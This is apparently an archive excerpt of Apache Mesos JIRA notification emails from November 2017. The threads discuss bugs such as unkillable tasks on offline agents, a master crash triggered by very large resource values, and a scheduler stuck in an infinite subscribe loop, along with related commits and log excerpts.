> '/volumes/sdb1/mesos/slaves/89192f68-d28f-498c-808f-442a1ef576b3-S2/frameworks/framework-id-daily/executors/Executor_920860/runs/29c82b61-1242-4de9-80cf-16f46c30e7e3'
> I1012 16:15:01.013290 124080 fetcher.cpp:353] Starting to fetch URIs for 
> container: 29c82b61-1242-4de9-80cf-16f46c30e7e3, directory: 
> /volumes/sdb1/mesos/slaves/89192f68-d28f-498c-808f-442a1ef576b3-S2/frameworks/framework-id-daily/executors/Executor_920860/runs/29c82b61-1242-4de9-80cf-16f46c30e7e3
> I1012 16:15:01.706429 124071 docker.cpp:909] Running docker -H 
> unix:///var/run/docker.sock run --cpu-shares 378 --memory 427819008 -e 
> LIBPROCESS_PORT=0 -e MESOS_AGENT_ENDPOINT=xxx.xxx.xxx.xxx:5051 -e 
> MESOS_CHECKPOINT=1 -e 
> MESOS_CONTAINER_NAME=mesos-89192f68-d28f-498c-808f-442a1ef576b3-S2.29c82b61-1242-4de9-80cf-16f46c30e7e3
>  -e 
> MESOS_DIRECTORY=/volumes/sdb1/mesos/slaves/89192f68-d28f-498c-808f-442a1ef576b3-S2/frameworks/framework-id-daily/executors/Executor_920860/runs/29c82b61-1242-4de9-80cf-16f46c30e7e3
>  -e MESOS_EXECUTOR_ID=Executor_920860 -e 
> MESOS_EXECUTOR_SHUTDOWN_GRACE_PERIOD=5secs -e 
> MESOS_FRAMEWORK_ID=framework-id-daily -e MESOS_HTTP_COMMAND_EXECUTOR=0 -e 
> MESOS_NATIVE_JAVA_LIBRARY=/usr/local/lib/libmesos-1.3.1.so -e 
> MESOS_NATIVE_LIBRARY=/usr/local/lib/libmesos-1.3.1.so -e 
> MESOS_RECOVERY_TIMEOUT=15mins -e MESOS_SANDBOX=/mnt/mesos/sandbox -e 
> MESOS_SLAVE_ID=89192f68-d28f-498c-808f-442a1ef576b3-S2 -e 
> MESOS_SLAVE_PID=slave(1)@xxx.xxx.xxx.xxx:5051 -e 
> MESOS_SUBSCRIPTION_BACKOFF_MAX=2secs -v 
> /volumes/sdb1/mesos/slaves/89192f68-d28f-498c-808f-442a1ef576b3-S2/frameworks/framework-id-daily/executors/Executor_920860/runs/29c82b61-1242-4de9-80cf-16f46c30e7e3:/mnt/mesos/sandbox
>  --net host --entrypoint /bin/sh --name 
> mesos-89192f68-d28f-498c-808f-442a1ef576b3-S2.29c82b61-1242-4de9-80cf-16f46c30e7e3
>  reg.docker.xxx/xx/executor:v25 -c env && cd $MESOS_SANDBOX && 
> ./executor.sh
> I1012 16:15:01.717859 124071 docker.cpp:1071] Running docker -H 
> unix:///var/run/docker.sock inspect 
> mesos-89192f68-d28f-498c-808f-442a1ef576b3-S2.29c82b61-1242-4de9-80cf-16f46c30e7e3
> I1012 16:15:02.033951 124085

[jira] [Commented] (MESOS-8111) Mesos sees task as running, but cannot kill it because the agent is offline

2017-11-13 Thread Cosmin Lehene (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8111?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250193#comment-16250193
 ] 

Cosmin Lehene commented on MESOS-8111:
--

[~vinodkone] Yes, Marathon.
I could capture the logs next time (the cluster is long gone). 
I think this was happening after scaling down from 100 nodes to 5 or 10. 

I'm trying to understand what prompted the default. Is it to avoid churn when 
having the master in a network partition? 
Perhaps we should adjust the rate limit for these use-cases.



> Mesos sees task as running, but cannot kill it because the agent is offline
> ---
>
> Key: MESOS-8111
> URL: https://issues.apache.org/jira/browse/MESOS-8111
> Project: Mesos
>  Issue Type: Bug
>  Components: master
>Affects Versions: 1.2.3
> Environment: DC/OS 1.9.4
>Reporter: Cosmin Lehene
>Assignee: Vinod Kone
>
> After scaling down a cluster, the master is reporting a task as running 
> although the slave has been long gone.
> At the same time it reports it can't kill it because the agent is offline
> {noformat}
> I1018 16:55:22.00  6976 master.cpp:4913] Processing KILL call for task 
> 'spark.7b59a77b-b353-11e7-addd-b29ecbf071e1' of framework 
> 4d2a982a-0e62-4471-88e8-8df9cc0ae437-0001 (marathon) at 
> scheduler-45eafb76-4510-482e-9bcc-06e3ad97c276@172.16.0.7:15101
> W1018 16:55:22.00  6976 master.cpp:5000] Cannot kill task 
> spark.7b59a77b-b353-11e7-addd-b29ecbf071e1 of framework 
> 4d2a982a-0e62-4471-88e8-8df9cc0ae437-0001 (marathon) at 
> scheduler-45eafb76-4510-482e-9bcc-06e3ad97c276@172.16.0.7:15101 because the 
> agent 4d2a982a-0e62-4471-88e8-8df9cc0ae437-S129 at slave(1)@10.0.0.81:5051 
> (10.0.0.81) is disconnected. Kill will be retried if the agent re-registers
> {noformat}
> Clearly, if the agent is offline the task is also not running. Also not sure 
> waiting indefinitely for an agent to recover is a good strategy.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Updated] (MESOS-8159) ns::clone uses an async signal unsafe stack

2017-11-13 Thread James Peach (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8159?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

James Peach updated MESOS-8159:
---
Priority: Major  (was: Critical)

> ns::clone uses an async signal unsafe stack
> ---
>
> Key: MESOS-8159
> URL: https://issues.apache.org/jira/browse/MESOS-8159
> Project: Mesos
>  Issue Type: Bug
>  Components: containerization
>Reporter: James Peach
>Assignee: James Peach
> Fix For: 1.4.1
>
>
> In {{ns::clone}}, the first child call {{os::clone}} without passing a 
> parameter for the stack. This causes {{os::clone}} to implicitly {{malloc}} a 
> stack, which is not async-signal-safe.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Commented] (MESOS-8159) ns::clone uses an async signal unsafe stack

2017-11-13 Thread James Peach (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8159?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250199#comment-16250199
 ] 

James Peach commented on MESOS-8159:


Downgrading priority; I don't think this critical.

> ns::clone uses an async signal unsafe stack
> ---
>
> Key: MESOS-8159
> URL: https://issues.apache.org/jira/browse/MESOS-8159
> Project: Mesos
>  Issue Type: Bug
>  Components: containerization
>Reporter: James Peach
>Assignee: James Peach
> Fix For: 1.4.1
>
>
> In {{ns::clone}}, the first child call {{os::clone}} without passing a 
> parameter for the stack. This causes {{os::clone}} to implicitly {{malloc}} a 
> stack, which is not async-signal-safe.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Created] (MESOS-8216) `os::cpus()` will return incorrect result on machines with > 64 CPUs

2017-11-13 Thread Andrew Schwartzmeyer (JIRA)
Andrew Schwartzmeyer created MESOS-8216:
---

 Summary: `os::cpus()` will return incorrect result on machines 
with > 64 CPUs
 Key: MESOS-8216
 URL: https://issues.apache.org/jira/browse/MESOS-8216
 Project: Mesos
  Issue Type: Bug
  Components: stout
 Environment: Windows
Reporter: Andrew Schwartzmeyer


>From Akash:

Just realized this, but I don't think function works if your machine has > 64 
CPUs. It calls GetSystemInfo, which returns the cpus of the "current" group, 
which is 64 max. Call GetMaximumProcessorCount(ALL_PROCESSOR_GROUPS) to get the 
right number. There was a bug fix in python with a similar issue to this: 
https://github.com/python/cpython/commit/c67bae04780f9d7590f9f91b4ee5f31c5d75b3c3



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Commented] (MESOS-8096) Enqueueing events in MockHTTPScheduler can lead to segfaults.

2017-11-13 Thread Alexander Rukletsov (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8096?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250227#comment-16250227
 ] 

Alexander Rukletsov commented on MESOS-8096:


{noformat}
Commit: 75f1274221de5169024008a4187ddb4edd3f9be3 [75f1274]
Author: Alexander Rukletsov ruklet...@gmail.com
Date: 13 November 2017 at 21:52:05 GMT+1
Committer: Alexander Rukletsov al...@apache.org

Refactored scheduler test driver to avoid using uninitialized object.

The shared pointer to MockHTTPScheduler is initialized after the
library, while the library may start using it right after its
initialization via the events callback. This change removes the
shared pointer altogether and hence prevents possible segfaults.

Review: https://reviews.apache.org/r/63611/
{noformat}
{noformat}
Commit: f221d8ebb1846e43d8c319bdcaf2694b1601f55b [f221d8e]
Author: Alexander Rukletsov ruklet...@gmail.com
Date: 13 November 2017 at 21:52:22 GMT+1
Committer: Alexander Rukletsov al...@apache.org

Refactored executor test driver to avoid using uninitialized object.

The shared pointer to MockHTTPExecutor is initialized after the library,
while the library may start using it right after its initialization via
the events callback. This change removes the shared pointer altogether
and hence prevents possible segfaults.

Review: https://reviews.apache.org/r/63613/
{noformat}
{noformat}
Commit: 8194e7cac77571f74c89f824ce3fe2afb5397cc5 [8194e7c]
Author: Alexander Rukletsov ruklet...@gmail.com
Date: 13 November 2017 at 21:52:28 GMT+1
Committer: Alexander Rukletsov al...@apache.org

Removed unnecessary check in v1 scheduler library.

Review: https://reviews.apache.org/r/63614/
{noformat}
{noformat}
Commit: 57eeef05668bf73cbc3c0c38ca28dbf0b90ab8b1 [57eeef0]
Author: Alexander Rukletsov ruklet...@gmail.com
Date: 13 November 2017 at 21:52:35 GMT+1
Committer: Alexander Rukletsov al...@apache.org

Passed scheduler as a shared pointer into the callback.

To ensure the lifetime of the scheduler is longer than the lifetime
of the scheduler library driver, pass scheduler as a shared_ptr.

Review: https://reviews.apache.org/r/63615/
{noformat}

> Enqueueing events in MockHTTPScheduler can lead to segfaults.
> -
>
> Key: MESOS-8096
> URL: https://issues.apache.org/jira/browse/MESOS-8096
> Project: Mesos
>  Issue Type: Bug
>  Components: scheduler driver, test
> Environment: Fedora 23, Ubuntu 14.04, Ubuntu 16
>Reporter: Alexander Rukletsov
>Assignee: Alexander Rukletsov
>  Labels: flaky-test, mesosphere
> Attachments: AsyncExecutorProcess-badrun-1.txt, 
> AsyncExecutorProcess-badrun-2.txt, AsyncExecutorProcess-badrun-3.txt
>
>
> Various tests segfault due to a yet unknown reason. Comparing logs (attached) 
> hints that the problem might be in the scheduler's event queue.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Commented] (MESOS-8200) Suppressed roles are not honoured for v1 scheduler subscribe requests.

2017-11-13 Thread Yan Xu (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8200?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250233#comment-16250233
 ] 

Yan Xu commented on MESOS-8200:
---

[~vinodkone] yes. I have the patch for the devolve code ready but this seems to 
be exposing some other bugs. Addressing them right now and will have it ready 
soon.

> Suppressed roles are not honoured for v1 scheduler subscribe requests.
> --
>
> Key: MESOS-8200
> URL: https://issues.apache.org/jira/browse/MESOS-8200
> Project: Mesos
>  Issue Type: Bug
>  Components: scheduler api, scheduler driver
>Reporter: Alexander Rukletsov
>Assignee: Yan Xu
>Priority: Critical
>
> When triaging MESOS-7996 I've found out that 
> {{Call.subscribe.suppressed_roles}} field is empty when the master processes 
> the request from a v1 HTTP scheduler. More precisely, [this 
> conversion|https://github.com/apache/mesos/blob/1132e1ddafa6a1a9bc8aa966bd01d7b35c7682d9/src/master/http.cpp#L969]
>  wipes the field. This is likely because this conversion relies on a general 
> [protobuf conversion 
> utility|https://github.com/apache/mesos/blob/1132e1ddafa6a1a9bc8aa966bd01d7b35c7682d9/src/internal/devolve.cpp#L28-L50],
>  which fails to copy {{suppressed_roles}} because they have different tags, 
> compare 
> [v0|https://github.com/apache/mesos/blob/1132e1ddafa6a1a9bc8aa966bd01d7b35c7682d9/include/mesos/scheduler/scheduler.proto#L271]
>  and 
> [v1|https://github.com/apache/mesos/blob/1132e1ddafa6a1a9bc8aa966bd01d7b35c7682d9/include/mesos/v1/scheduler/scheduler.proto#L258].



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Assigned] (MESOS-8198) Update the ReconcileOfferOperations protos

2017-11-13 Thread Greg Mann (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8198?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Greg Mann reassigned MESOS-8198:


Assignee: Greg Mann

> Update the ReconcileOfferOperations protos
> --
>
> Key: MESOS-8198
> URL: https://issues.apache.org/jira/browse/MESOS-8198
> Project: Mesos
>  Issue Type: Task
>Reporter: Gastón Kleiman
>Assignee: Greg Mann
>  Labels: mesosphere
>
> Some protos have been committed, but they follow an event-based API.
> We decided to follow the request/response model for this API, so we need to 
> update the protos.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Updated] (MESOS-8198) Update the ReconcileOfferOperations protos

2017-11-13 Thread Greg Mann (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8198?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Greg Mann updated MESOS-8198:
-
Shepherd: Vinod Kone

> Update the ReconcileOfferOperations protos
> --
>
> Key: MESOS-8198
> URL: https://issues.apache.org/jira/browse/MESOS-8198
> Project: Mesos
>  Issue Type: Task
>Reporter: Gastón Kleiman
>Assignee: Greg Mann
>  Labels: mesosphere
>
> Some protos have been committed, but they follow an event-based API.
> We decided to follow the request/response model for this API, so we need to 
> update the protos.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Commented] (MESOS-8129) Very large resource value crashes master

2017-11-13 Thread Benjamin Mahler (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8129?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250290#comment-16250290
 ] 

Benjamin Mahler commented on MESOS-8129:


Thanks Bruce for the well written ticket. I think I could compute this 
empirically based on adding 0.001 until I see the resultant skip a .001. 
Determining it more formally would take me some time given the fractional 
component complicates matters over integers in doubles (I.e. just use 
Number.MAX_SAFE_INTEGER).

Also, I'm curious what your use case is, can you tell me?

> Very large resource value crashes master
> 
>
> Key: MESOS-8129
> URL: https://issues.apache.org/jira/browse/MESOS-8129
> Project: Mesos
>  Issue Type: Bug
>  Components: agent, master
>Affects Versions: 1.4.0
> Environment: Ubuntu 14.04
> Both apt packages from Mesosphere repo and Docker images
>Reporter: Bruce Merry
>Assignee: Benjamin Mahler
>Priority: Minor
>
> I ran into a master that kept failing on this CHECK when destroying a task:
> https://github.com/apache/mesos/blob/1.4.0/src/master/allocator/sorter/drf/sorter.hpp#L367
> I found that a combination of a misconfiguration and a suboptimal choice of 
> units had let to an agent with a custom scalar resource of capacity 
> 429496729500. I believe what is happening is the pseudo-fixed-point 
> arithmetic isn't able to cope with such large numbers, because rounding 
> errors after arithmetic are bigger than 0.001. Examining the values in the 
> debugger that the CHECK failed due to a rounding error on the order of 0.2.
> While this is probably a fundamental limitation of the fixed-point 
> implementation and such large resource values are probably a bad idea, it 
> would have helped if the agent had complained on startup, rather than having 
> to debug an internal assertion failure. I'd suggest that values larger than, 
> say, 10^12 should be rejected when the agent starts (which is why I've added 
> the agent component), although someone familiar with the details of the 
> fixed-point implementation should probably verify that number.
> I'm not sure where this needs to be fixed e.g. if it can just be validated on 
> agent startup or if it should be baked into the Resource class to prevent 
> accidents in requests from the user.
> To reproduce the issue, start a master and an agent with a custom scalar 
> resource "thing:429496729500", then use mesos-execute to throw the 
> following task at it (it'll probably also work with a smaller Docker image - 
> that's just one I already had on the agent). When the sleep ends, the master 
> crashes.
> {code:javascript}
> {
>   "container": {
> "docker": {
>   "image": "ubuntu:xenial-20161010"
> }, 
> "type": "DOCKER"
>   }, 
>   "name": "test-task", 
>   "task_id": {
> "value": "0001"
>   }, 
>   "command": {
> "shell": false, 
> "value": "sleep", 
> "arguments": [
>   "10"
> ]
>   }, 
>   "agent_id": {
> "value": ""
>   }, 
>   "resources": [
> {
>   "scalar": {
> "value": 1
>   }, 
>   "type": "SCALAR", 
>   "name": "cpus"
> }, 
> {
>   "scalar": {
> "value": 4106.0
>   }, 
>   "type": "SCALAR", 
>   "name": "mem"
> }, 
> {
>   "scalar": {
> "value": 12465430.06012024
>   }, 
>   "type": "SCALAR", 
>   "name": "thing"
> }
>   ]
> }
> {code}



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Commented] (MESOS-8171) Using a failoverTimeout of 0 with Mesos native scheduler client can result in infinite subscribe loop

2017-11-13 Thread Meng Zhu (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8171?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250294#comment-16250294
 ] 

Meng Zhu commented on MESOS-8171:
-

Thanks Tim, we will take your fix.

Here we are correlating framework failover time with subscribe backoff time. 
The goal is to ensure that a framework can at least retry once before it gets 
dumped. This is a configuration issue. Instead of adding enforcing code here 
for the user, I think a more sound design would be to verify this during the 
configuration time and raise a warning if the user has a backoff max larger 
than failover time.

However, let's settle with the simple fix, for now.

> Using a failoverTimeout of 0 with Mesos native scheduler client can result in 
> infinite subscribe loop
> -
>
> Key: MESOS-8171
> URL: https://issues.apache.org/jira/browse/MESOS-8171
> Project: Mesos
>  Issue Type: Bug
>  Components: c++ api, java api, scheduler driver
>Affects Versions: 1.1.3, 1.2.2, 1.3.1, 1.4.0
>Reporter: Tim Harper
>Assignee: Meng Zhu
>Priority: Minor
>  Labels: mesosphere
>
> Over the past year, the Marathon team has been plagued with an issue that 
> hits our CI builds periodically in which the scheduler driver enters a tight 
> loop, sending 10,000s of SUBSCRIBE calls to the master per second. I turned 
> on debug logging for the client and the server, and it pointed to an issue 
> with the {{doReliableRegistration}} method in sched.cpp. Here's the logs:
> {code}
> WARN [05:39:39 EventsIntegrationTest-LocalMarathon-32858] I1104 
> 05:39:39.099815 13397 process.cpp:1383] libprocess is initialized on 
> 127.0.1.1:60957 with 8 worker threads
> WARN [05:39:39 EventsIntegrationTest-LocalMarathon-32858] I1104 
> 05:39:39.118237 13397 logging.cpp:199] Logging to STDERR
> WARN [05:39:39 EventsIntegrationTest-LocalMarathon-32858] I1104 
> 05:39:39.128921 13416 sched.cpp:232] Version: 1.4.0
> WARN [05:39:39 EventsIntegrationTest-LocalMarathon-32858] I1104 
> 05:39:39.151785 13791 group.cpp:341] Group process 
> (zookeeper-group(1)@127.0.1.1:60957) connected to ZooKeeper
> WARN [05:39:39 EventsIntegrationTest-LocalMarathon-32858] I1104 
> 05:39:39.151823 13791 group.cpp:831] Syncing group operations: queue size 
> (joins, cancels, datas) = (0, 0, 0)
> WARN [05:39:39 EventsIntegrationTest-LocalMarathon-32858] I1104 
> 05:39:39.151837 13791 group.cpp:419] Trying to create path '/mesos' in 
> ZooKeeper
> WARN [05:39:39 EventsIntegrationTest-LocalMarathon-32858] I1104 
> 05:39:39.152586 13791 group.cpp:758] Found non-sequence node 'log_replicas' 
> at '/mesos' in ZooKeeper
> WARN [05:39:39 EventsIntegrationTest-LocalMarathon-32858] I1104 
> 05:39:39.152662 13791 detector.cpp:152] Detected a new leader: (id='0')
> WARN [05:39:39 EventsIntegrationTest-LocalMarathon-32858] I1104 
> 05:39:39.152762 13791 group.cpp:700] Trying to get 
> '/mesos/json.info_00' in ZooKeeper
> WARN [05:39:39 EventsIntegrationTest-LocalMarathon-32858] I1104 
> 05:39:39.157148 13791 zookeeper.cpp:262] A new leading master 
> (UPID=master@172.16.10.95:32856) is detected
> WARN [05:39:39 EventsIntegrationTest-LocalMarathon-32858] I1104 
> 05:39:39.157347 13787 sched.cpp:336] New master detected at 
> master@172.16.10.95:32856
> WARN [05:39:39 EventsIntegrationTest-LocalMarathon-32858] I1104 
> 05:39:39.157557 13787 sched.cpp:352] No credentials provided. Attempting to 
> register without authentication
> WARN [05:39:39 EventsIntegrationTest-LocalMarathon-32858] I1104 
> 05:39:39.157565 13787 sched.cpp:836] Sending SUBSCRIBE call to 
> master@172.16.10.95:32856
> WARN [05:39:39 EventsIntegrationTest-LocalMarathon-32858] I1104 
> 05:39:39.157635 13787 sched.cpp:869] Will retry registration in 0ns if 
> necessary
> WARN [05:39:39 EventsIntegrationTest-LocalMarathon-32858] I1104 
> 05:39:39.158979 13785 sched.cpp:836] Sending SUBSCRIBE call to 
> master@172.16.10.95:32856
> WARN [05:39:39 EventsIntegrationTest-LocalMarathon-32858] I1104 
> 05:39:39.159029 13785 sched.cpp:869] Will retry registration in 0ns if 
> necessary
> WARN [05:39:39 EventsIntegrationTest-LocalMarathon-32858] I1104 
> 05:39:39.159265 13790 sched.cpp:836] Sending SUBSCRIBE call to 
> master@172.16.10.95:32856
> WARN [05:39:39 EventsIntegrationTest-LocalMarathon-32858] I1104 
> 05:39:39.159303 13790 sched.cpp:869] Will retry registration in 0ns if 
> necessary
> WARN [05:39:39 EventsIntegrationTest-LocalMarathon-32858] I1104 
> 05:39:39.159479 13786 sched.cpp:836] Sending SUBSCRIBE call to 
> master@172.16.10.95:32856
> WARN [05:39:39 EventsIntegrationTest-LocalMarathon-32858] I1104 
> 05:39:39.159521 13786 sched.cpp:869] Will retry registration in 0ns if 
> necessary
> WARN [05:39:39 EventsIntegrationTest-Local

[jira] [Commented] (MESOS-7506) Multiple tests leave orphan containers.

2017-11-13 Thread Alexander Rukletsov (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-7506?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250352#comment-16250352
 ] 

Alexander Rukletsov commented on MESOS-7506:


{noformat}
Commit: a595bcbf7afd9783e15f3e32cd9e70fa979531df [a595bcb]
Author: Andrei Budnik 
Date: 13 November 2017 at 21:59:17 GMT+1
Committer: Alexander Rukletsov 
Commit Date: 13 November 2017 at 23:15:43 GMT+1

Fixed bug in tests leading to orphaned containers.

Previously, some tests tried to advance the clock until task status
update was sent, while task's container was destroying. Container
destruction consists of multiple steps, where some steps have a timeout
specified, e.g. `cgroups::DESTROY_TIMEOUT`. So, there was a race
between container destruction process and the loop that advanced the
clock, leading to the following outcomes:

  (1) Container destroyed, before clock advancing reaches timeout.

  (2) Triggered timeout due to clock advancing, before container
  destruction completes. That results in leaving orphaned
  containers that will be detected by Slave destructor in
  `tests/cluster.cpp`, so the test will fail.

This change gets rid of the loop and resumes clock after a single
advancing of the clock.

Review: https://reviews.apache.org/r/63589/
{noformat}

> Multiple tests leave orphan containers.
> ---
>
> Key: MESOS-7506
> URL: https://issues.apache.org/jira/browse/MESOS-7506
> Project: Mesos
>  Issue Type: Bug
>  Components: containerization
> Environment: Ubuntu 16.04
> Fedora 23
> other Linux distros
>Reporter: Alexander Rukletsov
>Assignee: Andrei Budnik
>  Labels: containerizer, flaky-test, mesosphere
> Attachments: KillMultipleTasks-badrun.txt, 
> ResourceLimitation-badrun.txt, ResourceLimitation-badrun2.txt, 
> RestartSlaveRequireExecutorAuthentication-badrun.txt, 
> TaskWithFileURI-badrun.txt
>
>
> I've observed a number of flaky tests that leave orphan containers upon 
> cleanup. A typical log looks like this:
> {noformat}
> ../../src/tests/cluster.cpp:580: Failure
> Value of: containers->empty()
>   Actual: false
> Expected: true
> Failed to destroy containers: { da3e8aa8-98e7-4e72-a8fd-5d0bae960014 }
> {noformat}
> All currently affected tests:
> {noformat}
> ROOT_DOCKER_DockerAndMesosContainerizers/DefaultExecutorTest.KillTask/0
> ROOT_DOCKER_DockerAndMesosContainerizers/DefaultExecutorTest.TaskWithFileURI/0
> ROOT_DOCKER_DockerAndMesosContainerizers/DefaultExecutorTest.ResourceLimitation/0
> ROOT_DOCKER_DockerAndMesosContainerizers/DefaultExecutorTest.KillMultipleTasks/0
> SlaveRecoveryTest/0.RecoverUnregisteredExecutor
> SlaveRecoveryTest/0.CleanupExecutor
> SlaveRecoveryTest/0.RecoverTerminatedExecutor
> SlaveTest.ShutdownUnregisteredExecutor
> SlaveTest.RestartSlaveRequireExecutorAuthentication
> ShutdownUnregisteredExecutor
> {noformat}



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Updated] (MESOS-8139) Upgrade protobuf to 3.4.x.

2017-11-13 Thread Benjamin Mahler (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8139?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Benjamin Mahler updated MESOS-8139:
---
Shepherd: Benjamin Mahler

> Upgrade protobuf to 3.4.x.
> --
>
> Key: MESOS-8139
> URL: https://issues.apache.org/jira/browse/MESOS-8139
> Project: Mesos
>  Issue Type: Task
>Reporter: Benjamin Mahler
>Assignee: Dmitry Zhuk
>  Labels: performance
>
> The 3.4.x release includes move support:
> https://github.com/google/protobuf/releases/tag/v3.4.0
> This will provide some performance improvements for us, and will allow us to 
> start using move semantics for messages.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Assigned] (MESOS-8139) Upgrade protobuf to 3.4.x.

2017-11-13 Thread Benjamin Mahler (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8139?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Benjamin Mahler reassigned MESOS-8139:
--

Assignee: Dmitry Zhuk

> Upgrade protobuf to 3.4.x.
> --
>
> Key: MESOS-8139
> URL: https://issues.apache.org/jira/browse/MESOS-8139
> Project: Mesos
>  Issue Type: Task
>Reporter: Benjamin Mahler
>Assignee: Dmitry Zhuk
>  Labels: performance
>
> The 3.4.x release includes move support:
> https://github.com/google/protobuf/releases/tag/v3.4.0
> This will provide some performance improvements for us, and will allow us to 
> start using move semantics for messages.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Commented] (MESOS-8139) Upgrade protobuf to 3.4.x.

2017-11-13 Thread Benjamin Mahler (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8139?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250412#comment-16250412
 ] 

Benjamin Mahler commented on MESOS-8139:


Funny enough, they just released 3.5.0, with:

{quote}
Added move constructor and move assignment to RepeatedField, RepeatedPtrField
{quote}

https://github.com/google/protobuf/releases/tag/v3.5.0

[~dzhuk] do you want to upgrade instead to 3.5.0 directly to avoid the extra 
bloat in the git repo?

> Upgrade protobuf to 3.4.x.
> --
>
> Key: MESOS-8139
> URL: https://issues.apache.org/jira/browse/MESOS-8139
> Project: Mesos
>  Issue Type: Task
>Reporter: Benjamin Mahler
>  Labels: performance
>
> The 3.4.x release includes move support:
> https://github.com/google/protobuf/releases/tag/v3.4.0
> This will provide some performance improvements for us, and will allow us to 
> start using move semantics for messages.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Comment Edited] (MESOS-8129) Very large resource value crashes master

2017-11-13 Thread Benjamin Mahler (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8129?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250290#comment-16250290
 ] 

Benjamin Mahler edited comment on MESOS-8129 at 11/13/17 10:54 PM:
---

Thanks Bruce for the well written ticket. Determining the biggest safe scalar 
would take me some time given the fractional component complicates matters over 
integers in doubles (I.e. where we can just use Number.MAX_SAFE_INTEGER).

Also, I'm curious what your use case is, can you tell me?


was (Author: bmahler):
Thanks Bruce for the well written ticket. Determining it more formally would 
take me some time given the fractional component complicates matters over 
integers in doubles (I.e. just use Number.MAX_SAFE_INTEGER).

Also, I'm curious what your use case is, can you tell me?

> Very large resource value crashes master
> 
>
> Key: MESOS-8129
> URL: https://issues.apache.org/jira/browse/MESOS-8129
> Project: Mesos
>  Issue Type: Bug
>  Components: agent, master
>Affects Versions: 1.4.0
> Environment: Ubuntu 14.04
> Both apt packages from Mesosphere repo and Docker images
>Reporter: Bruce Merry
>Assignee: Benjamin Mahler
>Priority: Minor
>
> I ran into a master that kept failing on this CHECK when destroying a task:
> https://github.com/apache/mesos/blob/1.4.0/src/master/allocator/sorter/drf/sorter.hpp#L367
> I found that a combination of a misconfiguration and a suboptimal choice of 
> units had let to an agent with a custom scalar resource of capacity 
> 429496729500. I believe what is happening is the pseudo-fixed-point 
> arithmetic isn't able to cope with such large numbers, because rounding 
> errors after arithmetic are bigger than 0.001. Examining the values in the 
> debugger that the CHECK failed due to a rounding error on the order of 0.2.
> While this is probably a fundamental limitation of the fixed-point 
> implementation and such large resource values are probably a bad idea, it 
> would have helped if the agent had complained on startup, rather than having 
> to debug an internal assertion failure. I'd suggest that values larger than, 
> say, 10^12 should be rejected when the agent starts (which is why I've added 
> the agent component), although someone familiar with the details of the 
> fixed-point implementation should probably verify that number.
> I'm not sure where this needs to be fixed e.g. if it can just be validated on 
> agent startup or if it should be baked into the Resource class to prevent 
> accidents in requests from the user.
> To reproduce the issue, start a master and an agent with a custom scalar 
> resource "thing:429496729500", then use mesos-execute to throw the 
> following task at it (it'll probably also work with a smaller Docker image - 
> that's just one I already had on the agent). When the sleep ends, the master 
> crashes.
> {code:javascript}
> {
>   "container": {
> "docker": {
>   "image": "ubuntu:xenial-20161010"
> }, 
> "type": "DOCKER"
>   }, 
>   "name": "test-task", 
>   "task_id": {
> "value": "0001"
>   }, 
>   "command": {
> "shell": false, 
> "value": "sleep", 
> "arguments": [
>   "10"
> ]
>   }, 
>   "agent_id": {
> "value": ""
>   }, 
>   "resources": [
> {
>   "scalar": {
> "value": 1
>   }, 
>   "type": "SCALAR", 
>   "name": "cpus"
> }, 
> {
>   "scalar": {
> "value": 4106.0
>   }, 
>   "type": "SCALAR", 
>   "name": "mem"
> }, 
> {
>   "scalar": {
> "value": 12465430.06012024
>   }, 
>   "type": "SCALAR", 
>   "name": "thing"
> }
>   ]
> }
> {code}



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Comment Edited] (MESOS-8129) Very large resource value crashes master

2017-11-13 Thread Benjamin Mahler (JIRA)

[ 
